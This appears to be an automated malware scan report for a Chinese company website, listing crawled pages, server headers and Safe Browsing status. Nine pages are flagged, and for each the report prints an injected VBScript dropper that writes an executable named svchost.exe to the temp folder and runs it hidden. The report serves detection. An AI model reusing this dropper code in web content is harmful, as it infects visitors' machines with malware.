Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=zhangruifenb.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.zhangruifenb.net/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:02:39 GMT Accept-Ranges: bytes ETag: "b0a53657892bd01:155f" Server: Microsoft-IIS/6.0 Content-Length: 17429 Content-Location: http://www.zhangruifenb.net/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 21:23:26 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/index.html | 200 OK Content-Length: 17429 Content-Type: text/html | clean |
http://www.zhangruifenb.net/skin/tupian/qq.js | 200 OK Content-Length: 4289 Content-Type: application/x-javascript | clean |
http://www.zhangruifenb.net/lxwm/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:02:43 GMT Accept-Ranges: bytes ETag: "b5916977594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121742 Content-Location: http://www.zhangruifenb.net/lxwm/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:11:38 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/lxwm/index.html | 200 OK Content-Length: 121742 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/about | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:02:47 GMT Location: http://www.zhangruifenb.net/about/ Server: Microsoft-IIS/6.0 Content-Length: 157 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/about/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:02:48 GMT Accept-Ranges: bytes ETag: "75438a687594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 122223 Content-Location: http://www.zhangruifenb.net/about/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:20 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/about/index.html | 200 OK Content-Length: 122223 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/news | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:02:52 GMT Location: http://www.zhangruifenb.net/news/ Server: Microsoft-IIS/6.0 Content-Length: 156 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/news/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:02:54 GMT Accept-Ranges: bytes ETag: "34564757892bd01:155f" Server: Microsoft-IIS/6.0 Content-Length: 16040 Content-Location: http://www.zhangruifenb.net/news/index.html Content-Type: text/html Last-Modified: Thu, 08 Jan 2015 21:23:26 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/news/index.html | 200 OK Content-Length: 16040 Content-Type: text/html | clean |
http://www.zhangruifenb.net/cpzx | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:02:56 GMT Location: http://www.zhangruifenb.net/cpzx/ Server: Microsoft-IIS/6.0 Content-Length: 156 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/cpzx/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:02:56 GMT Accept-Ranges: bytes ETag: "51a97b6b7594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 125456 Content-Location: http://www.zhangruifenb.net/cpzx/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:25 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/cpzx/index.html | 200 OK Content-Length: 125456 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/job | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:03:01 GMT Location: http://www.zhangruifenb.net/job/ Server: Microsoft-IIS/6.0 Content-Length: 155 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/job/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:01 GMT Accept-Ranges: bytes ETag: "9181fe967594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120931 Content-Location: http://www.zhangruifenb.net/job/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:11:38 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/job/index.html | 200 OK Content-Length: 120931 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/lxwm | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:03:06 GMT Location: http://www.zhangruifenb.net/lxwm/ Server: Microsoft-IIS/6.0 Content-Length: 156 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/test404page.js | 404 Not Found Content-Length: 1308 Content-Type: text/html | clean |
http://www.zhangruifenb.net/dlhz | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:03:08 GMT Location: http://www.zhangruifenb.net/dlhz/ Server: Microsoft-IIS/6.0 Content-Length: 156 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/dlhz/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:08 GMT Accept-Ranges: bytes ETag: "f0a8f4717594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121091 Content-Location: http://www.zhangruifenb.net/dlhz/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:36 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/dlhz/index.html | 200 OK Content-Length: 121091 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/fw | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:03:13 GMT Location: http://www.zhangruifenb.net/fw/ Server: Microsoft-IIS/6.0 Content-Length: 154 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/fw/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:15 GMT Accept-Ranges: bytes ETag: "be47e4967594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121224 Content-Location: http://www.zhangruifenb.net/fw/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:11:38 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/fw/index.html | 200 OK Content-Length: 121224 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/khal | HTTP/1.1 301 Moved Permanently Date: Fri, 09 Jan 2015 00:03:20 GMT Location: http://www.zhangruifenb.net/khal/ Server: Microsoft-IIS/6.0 Content-Length: 156 Content-Type: text/html X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/khal/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:21 GMT Accept-Ranges: bytes ETag: "4e6da977594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 120880 Content-Location: http://www.zhangruifenb.net/khal/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:11:38 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/khal/index.html | 200 OK Content-Length: 120880 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/cpzx/c1/s2/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:25 GMT Accept-Ranges: bytes ETag: "39ae78697594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121646 Content-Location: http://www.zhangruifenb.net/cpzx/c1/s2/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:21 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/cpzx/c1/s2/index.html | 200 OK Content-Length: 121646 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/cpzx/c1/2/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:29 GMT Accept-Ranges: bytes ETag: "69f2b9687594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121654 Content-Location: http://www.zhangruifenb.net/cpzx/c1/2/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:20 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/cpzx/c1/2/index.html | 200 OK Content-Length: 121654 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/cpzx/c1/3/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:34 GMT Accept-Ranges: bytes ETag: "e29f8697594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 122160 Content-Location: http://www.zhangruifenb.net/cpzx/c1/3/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:21 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/cpzx/c1/3/index.html | 200 OK Content-Length: 122160 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
| ||
http://www.zhangruifenb.net/cpzx/c1/4/ | HTTP/1.1 200 OK Date: Fri, 09 Jan 2015 00:03:38 GMT Accept-Ranges: bytes ETag: "3151e697594cf1:155f" Server: Microsoft-IIS/6.0 Content-Length: 121576 Content-Location: http://www.zhangruifenb.net/cpzx/c1/4/index.html Content-Type: text/html Last-Modified: Mon, 30 Jun 2014 15:10:21 GMT X-Powered-By: ASP.NET | clean |
http://www.zhangruifenb.net/cpzx/c1/4/index.html | 200 OK Content-Length: 121576 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) <!--
DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: zhangruifenb.net
Result:
GET / HTTP/1.1
Host: zhangruifenb.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: zhangruifenb.net
Referer: http://www.google.com/search?q=zhangruifenb.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: zhangruifenb.net
Referer: http://www.google.com/search?q=zhangruifenb.net
Result:
The result is similar to the first query. There are no suspicious redirects found.